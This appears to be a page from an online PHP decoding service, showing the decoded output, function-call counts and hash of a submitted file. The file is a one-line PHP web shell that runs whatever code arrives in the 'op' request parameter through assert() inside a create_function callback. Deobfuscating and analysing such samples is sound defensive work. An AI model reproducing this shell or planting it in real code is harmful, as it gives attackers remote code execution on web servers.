Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'),..
Decoded Output download
<?php
mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'),$_REQUEST['op']);
?>
Did this file decode correctly?
Original Code
<?php
mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'),$_REQUEST['op']);
?>
Function Calls
assert | 1 |
create_function | 1 |
Stats
MD5 | 34c6133228470e6fa5f34091ef7ccc3b |
Eval Count | 1 |
Decode Time | 117 ms |